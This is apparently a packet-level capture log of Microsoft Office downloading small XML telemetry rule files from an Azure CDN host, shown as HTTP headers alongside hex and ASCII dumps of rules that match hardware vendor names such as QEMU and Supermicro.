                                                                                                                                                                                                                                                                            2024-12-03 18:00:04 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            101192.168.2.45003813.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:04 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:04 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                                                            x-ms-request-id: 15a89213-901e-0083-02aa-42bb55000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180004Z-174f7845968px8v7hC1EWR08ng00000016k0000000009khn
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:04 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            102192.168.2.45003713.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:04 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:04 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                                            x-ms-request-id: 1fbe2e95-401e-0083-4bb4-43075c000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180004Z-174f7845968psccphC1EWRuz9s00000016gg00000000e5mm
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:05 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            103192.168.2.45003913.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:04 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:04 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                                                            x-ms-request-id: d3508ca6-601e-003d-4e91-3f6f25000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180004Z-174f7845968nxc96hC1EWRspw800000015yg00000000n4vt
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:05 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            104192.168.2.45004013.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:05 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:05 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                                                            x-ms-request-id: f7ef784b-001e-0066-274f-44561e000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180005Z-174f7845968nxc96hC1EWRspw8000000160g00000000dv5x
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:05 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            105192.168.2.45005113.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:06 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:06 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                                                            x-ms-request-id: 18a648ed-001e-0049-1ef9-445bd5000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180006Z-174f7845968kdththC1EWRzvxn0000000khg00000000qq56
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:07 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            106192.168.2.45005213.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:06 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:06 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 432
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                                                            x-ms-request-id: da27d7c4-b01e-005c-4391-3f4c66000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180006Z-174f7845968kvnqxhC1EWRmf3g0000000syg00000000weww
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:07 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            107192.168.2.45005313.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:06 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:07 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                                                            x-ms-request-id: 3d9c2adf-901e-00ac-7b91-3fb69e000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180007Z-174f78459688l8rvhC1EWRtzr00000000kt000000000s7vn
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:07 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            108192.168.2.45005413.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:06 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:07 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                                            x-ms-request-id: 2c4a3109-201e-006e-360e-45bbe3000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180007Z-174f7845968n2hr8hC1EWR9cag00000015tg00000000xadf
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:07 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            109192.168.2.45005513.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:07 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:07 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                                            x-ms-request-id: 56901f94-d01e-002b-530d-4125fb000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180007Z-174f7845968pght8hC1EWRyvxg00000009f00000000070hn
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
